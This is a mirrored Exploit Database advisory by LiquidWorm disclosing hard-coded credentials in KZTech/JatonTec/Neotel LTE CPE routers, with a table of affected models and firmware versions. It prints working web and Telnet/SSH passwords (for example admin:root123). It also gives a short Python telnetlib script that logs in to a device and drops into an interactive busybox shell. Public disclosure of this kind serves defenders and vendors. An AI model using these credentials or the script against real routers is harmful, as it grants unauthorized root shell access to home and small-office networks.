KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 – Hard coded Credentials Shell Access

• Exploit Database
• 104 阅读

• 作者： LiquidWorm
  日期： 2021-03-19
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/49682/

• # Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access
  # Date: 03.02.2021
  # Exploit Author: LiquidWorm
  # Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
  
  Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
  Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
  http://www.jatontec.com/products/show.php?itemid=258
  http://www.jatontech.com/CAT12.html#_pp=105_564
  http://www.kzbtech.com/AM3300V.html
  Останати пакети
  
  Affected version:Model | Firmware
  -------|---------
   JT3500V | 2.0.1B1064
   JT3300V | 2.0.1B1047
   AM6200M | 2.0.0B3210
   AM6000N | 2.0.0B3042
   AM5000W | 2.0.0B3037
   AM4200M | 2.0.0B2996
   AM4100V | 2.0.0B2988
  AM3500MW | 2.0.0B1092
   AM3410V | 2.0.0B1085
   AM3300V | 2.0.0B1060
   AM3100E | 2.0.0B981
   AM3100V | 2.0.0B946
   AM3000M | 2.0.0B21
   KZ7621U | 2.0.0B14
   KZ3220M | 2.0.0B04
   KZ3120R | 2.0.0B01
  
  Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
  & VoIP CPE product specially designed to enable quick and easy
  LTE fixed data service deployment for residential and SOHO customers.
  It provides high speed LAN, Wi-Fi and VoIP integrated services
  to end users who need both bandwidth and multi-media data service
  in residential homes or enterprises. The device has 2 Gigabit LAN
  ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
  CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
  and firewall software for security. It provides an effective
  all-in-one solution to SOHO or residential customers. It can
  deliver up to 1Gbps max data throughput which can be very
  competitive to wired broadband access service.
  
  Desc: The device utilizes hard-coded credentials within its Linux
  distribution image. These sets of credentials are never exposed to
  the end-user and cannot be changed through any normal operation of
  the router.
  
  Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
   Linux 2.6.36+ (mips)
   Mediatek APSoC SDK v4.3.1.0
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2021-5637
  Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5637.php
  
  
  03.02.2021
  
  --
  
  
  Default web creds:
  ------------------
  admin:admin123
  user:user123
  
  Telnet/SSH access:
  ------------------
  admin:root123
  
  ===
  
  import telnetlib
  
  host="192.168.1.1"
  user="admin"
  password="root123"
  s=telnetlib.Telnet(host)
  s.read_until(b"CPE login: ")
  s.write(user.encode('ascii') + b"\n")
  s.read_until(b"Password: ")
  s.write(password.encode('ascii') + b"\n")
  s.write(b"busybox\n")
  print(s.read_all().decode('ascii'))
  s.mt_interact()
  s.close()
  

  Python

  Copy